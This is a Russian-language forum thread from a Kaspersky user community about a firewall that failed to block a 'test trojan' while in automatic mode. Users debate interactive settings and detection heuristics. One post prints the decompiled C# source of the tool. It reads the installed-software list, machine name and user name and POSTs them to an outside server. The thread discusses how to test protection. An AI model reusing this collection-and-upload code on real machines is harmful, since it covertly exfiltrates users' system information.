Перейти к содержанию

Уязвимость файрвола Касперского?

Gangster

Автор Gangster
в Помощь по персональным продуктам

 Поделиться

Рекомендуемые сообщения

SLASH_id

SLASH_id

Опубликовано
Опубликовано (изменено)

Мда.....

 

post-3402-1274733607_thumb.png

 

Да, авторежим. Но если НАПИСАНО что "Запрос действия" то где запрос?

Изменено пользователем SLASH_id
  • Ответов 113
  • Создана
  • Последний ответ

Топ авторов темы

  • apq

    37

  • Gangster

    24

  • Самогонщик

    7

  • пользователь

    7

Топ авторов темы

Популярные посты

Black Angel
Black Angel

Я всегда интерактивный режим ставлю. Нужные программы уже настроены, чтобы вопросов не было, а что подозрительное появляется, как в этом случае, уже алерт будет.

apq
apq

то есть в правилах контроля программ и сетевого экрана? пользователь, я не придираюсь, я пытаюсь разобраться как правильно настроить то есть a сетевом ставить разрешить все, в правилах контроля пр

пользователь
пользователь

Задаваемые вами вопросы просто недостойны Золотого бета-тестера. Боюсь, что я только могу вам порекомендовать держаться подальше от компьютеров и любого оборудования сложнее лопаты.

Изображения в теме

Андрей

Андрей

Опубликовано
Опубликовано

Что опасного в этой программе, почему она должна детектироваться? Вы скачали её и запустили целеустремленно на компьютере, к которому у вас есть доступ, а как вы её на моем запустите?

apq

apq

Опубликовано
Опубликовано
Но если НАПИСАНО что "Запрос действия" то где запрос?

это судя по всему работает только в неавторежиме. надо у Данилки переспросить

AgentMC

AgentMC

Опубликовано
Опубликовано (изменено)
Да, авторежим. Но если НАПИСАНО что "Запрос действия" то где запрос?

Это, блин кто спрашивает?! ГБТ с многолетним стажем или третьеклассник-чайник?! В шоке!

Запросы действия в блонди-моде интерпретируются как "разрешить".

 

 

Песец... прога на C# написана. Код:

Раскрывающийся текст:

private void MainForm_Load(object sender, EventArgs e)
{
   StringBuilder builder = new StringBuilder();
   try
   {
       builder.AppendFormat("<h1>Информация, полученная от проверочного трояна</h1><b>Загружено:</b> {2}<br/><b>Компьютер:</b> {0}<br/><b>Пользователь:</b> {1}<br/><br/><h2>Установленные программы:</h2><blockquote style=\"width: 700px; height: 500px; overflow: scroll\">", Environment.MachineName, Environment.UserName, DateTime.Now.ToString());
       RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall");
       foreach (string str in key.GetSubKeyNames())
       {
           try
           {
               RegistryKey key2 = key.OpenSubKey(str);
               object obj2 = key2.GetValue("DisplayName");
               object obj3 = key2.GetValue("DisplayVersion");
               if ((obj2 != null) && (obj2.ToString().Trim() != ""))
               {
                   string str2 = string.Format("<b>{0}</b> {1}<br/>", obj2.ToString(), (obj3 == null) ? "" : ("(" + obj3.ToString() + ")"));
                   builder.Append(str2);
               }
               key2.Close();
           }
           catch (Exception exception)
           {
               builder.Append(exception.ToString());
           }
       }
       key.Close();
       builder.Append("</blockquote>");
   }
   catch (Exception exception2)
   {
       builder.Append(exception2.ToString());
   }
   try
   {
       string str3 = Guid.NewGuid().ToString("N");
       string str4 = string.Format("session={0}&info={1}", str3, HttpUtility.UrlEncode(builder.ToString()));
       WebRequest request = WebRequest.Create("http://www.goodware.ru/trojan/upload.php");
       request.Method = "POST";
       request.ContentType = "application/x-www-form-urlencoded";
       request.ContentLength = str4.Length;
       StreamWriter writer = new StreamWriter(request.GetRequestStream());
       writer.Write(str4);
       writer.Close();
       using (StreamReader reader = new StreamReader(request.GetResponse().GetResponseStream()))
       {
           reader.ReadToEnd();
           this.UpdateResult(string.Format("http://www.goodware.ru/trojan/check.php?session={0}", str3), "Информация об установленных на Вашем компьютере программах была успешно собрана и беспрепятственно отправлена на наш сайт. Вы можете посмотреть ее по этой ссылке:\n\n{0}\n\nДанная информация будет доступна по этой ссылке в течении суток, затем она удаляется с сайта.");
       }
   }
   catch (Exception exception3)
   {
       this.UpdateResult("http://www.goodware.ru/trojan/", string.Format("Информация об установленных на Вашем компьютере программах была успешно собрана, но при отправке произошла ошибка:\n\n{0}\n\nВозможно, но не обязательно, это связано с успешной работой антивирусной программы или фаервола.\nВы можете свой оставить отзыв по этой ссылке:\n\n{{0}}\n\nНапишите текст ошибки и какой программой для защиты Вы пользуетесь. Возможно, это поможет другим.", exception3.Message));
   }
}

private void UpdateResult(string link, string text)
{
   this._linkUrl = link;
   this.lnkResult.Text = string.Format(text, link);
   this.lnkResult.LinkArea = new LinkArea(this.lnkResult.Text.IndexOf(link), link.Length);
}

private void lnkResult_LinkClicked(object sender, LinkLabelLinkClickedEventArgs e)
{
   Process.Start(this._linkUrl);
}

 

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall - вот где прога шарится до смерти просто. В этой ветке нет личной информации пользователя - только список софта на машине. С чего бы вдруг ПДМу это блочить?

//Хотя BSS по принципу "прога что-то прочитала и просится в сеть" - неплохо было бы прикрутить.

Изменено пользователем AgentMC
Umnik

Umnik

Опубликовано
Опубликовано
//Хотя BSS по принципу "прога что-то прочитала и просится в сеть" - неплохо было бы прикрутить.

Все IM клиенты будем сносить по BSS тогда. Они читают как минимум настройки прокси из IE, а еще могут свои собственные.

apq

apq

Опубликовано
Опубликовано
Все IM клиенты будем сносить по BSS тогда. Они читают как минимум настройки прокси из IE, а еще могут свои собственные.

а чего они должны блочится? разве IM клиенты не имеют цифровых подписей известных ЛК и не значатся в списках известных ЛК приложений?

пользователь

пользователь

Опубликовано
Опубликовано
а чего они должны блочится? разве IM клиенты не имеют цифровых подписей известных ЛК и не значатся в списках известных ЛК приложений?

Не все. Далеко не все.

Но если не нравится пример с IM клиентами, то могу предположить другой - спецсофт отправляет на сервер активации информацию об оборудовании. Я бы слегка расстроился, если у него не получилось.

 

А ведь этот пример идеально повторяет этот "тест".

apq

apq

Опубликовано
Опубликовано
могу предположить другой - спецсофт отправляет на сервер активации информацию об оборудовании. Я бы слегка расстроился, если у него не получилось.

 

А ведь этот пример идеально повторяет этот "тест".

KIS выдаст алерт и вы сами разрешите действие программе, это не проблема...

SLASH_id

SLASH_id

Опубликовано
Опубликовано
Это, блин кто спрашивает?! ГБТ с многолетним стажем или третьеклассник-чайник?! В шоке!

Запросы действия в блонди-моде интерпретируются как "разрешить".

 

Это понятно)) Возникло предложение к следующей версии продукта, вместо кружочков с вопросами, и подобных типа запрет или наследование отрисовывать кружочек с буковкой "А" если включен авторежим.

А то третьеклассник-чайник посмотрит - ага, стоит запрос и будет возмущаться чего ж не спрашивает. Тем более при установке КИСа не спрашивает режим, а ставит автоматику по дефолту.

AgentMC

AgentMC

Опубликовано
Опубликовано (изменено)
Возникло предложение
Вроде внимательно смотрел... не нашёл :)
Все IM клиенты будем сносить по BSS тогда. Они читают как минимум настройки прокси из IE, а еще могут свои собственные.
Во втором часу ночи формулировка свелась уже к "если прога из Сл.Огр. читает более 40 ключей реестрав разных ветках, а затем пытается отослать информацию в виде единого ПОСТ-запроса по хттп независимо от порта" -> ... :)
Но если не нравится пример с IM клиентами, то могу предположить другой - спецсофт отправляет на сервер активации информацию об оборудовании. Я бы слегка расстроился, если у него не получилось.
На спецсофт есть админ, который в курсе, что такое интерактив. Изменено пользователем AgentMC
Kapral

Kapral

Опубликовано
Опубликовано
Я бы слегка расстроился, если у него не получилось.
А уж как расстроится бухгалтерия когда их инфо-система с последними редакциями указявок от правительства не запустится......

 

На спецсофт есть админ, который в курсе,
На спец-софт - есть не только админ - но и корпоративка :)
пользователь

пользователь

Опубликовано
Опубликовано (изменено)
KIS выдаст алерт и вы сами разрешите действие программе, это не проблема...

Это ваше право - настройте соответственно.

Кстати, может вы не знаете, но KIS специально сделан так, чтобы задавать вопросы только в важных случаях. Чтобы у покупателя не вырабатывался рефлекс "разрешить". ИМХО: отправка сведений об оборудовании не может считаться важным.

 

Только не говорите мне, что домушники могут таким образом собирать сведения о компьютерах, чтобы планировать свои кражи - я смеяться буду.

 

На спецсофт есть админ, который в курсе, что такое интерактив.

А если это домашний софт? Например, игра подобно сталкеру, использующая технологию старфорса "резервная копия"?

Изменено пользователем пользователь
apq

apq

Опубликовано
Опубликовано
Это ваше право - настройте соответственно.

то есть включить интерактивный режим? аиесли я хочу принимать решения только по сетевой активности?

Кстати, может вы не знаете, но KIS специально сделан так, чтобы задавать вопросы только в важных случаях. Чтобы у покупателя не вырабатывался рефлекс "разрешить". ИМХО: отправка сведений об оборудовании не может считаться важным.

заметьте, вы сами пишете что имхо. ваше право так считать. а я например считаю, что любой софт без моего ведома не должен собирать какую либо информацию с моего ПК и передавать ее куда-то?

вот если бы можно было выбирать интерактивный режим по отдельным компонентам защиты, а не в целом по защите. это было бы правильнее

Kapral

Kapral

Опубликовано
Опубликовано
вот если бы можно было выбирать интерактивный режим по отдельным компонентам защиты, а не в целом по защите. это было бы правильнее

Да без проблем

Включается интерактивный режим - все что на автомат - ставите или разрешить или запретить. А что нужно - Вопр.знак

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем
×
×
  • Создать...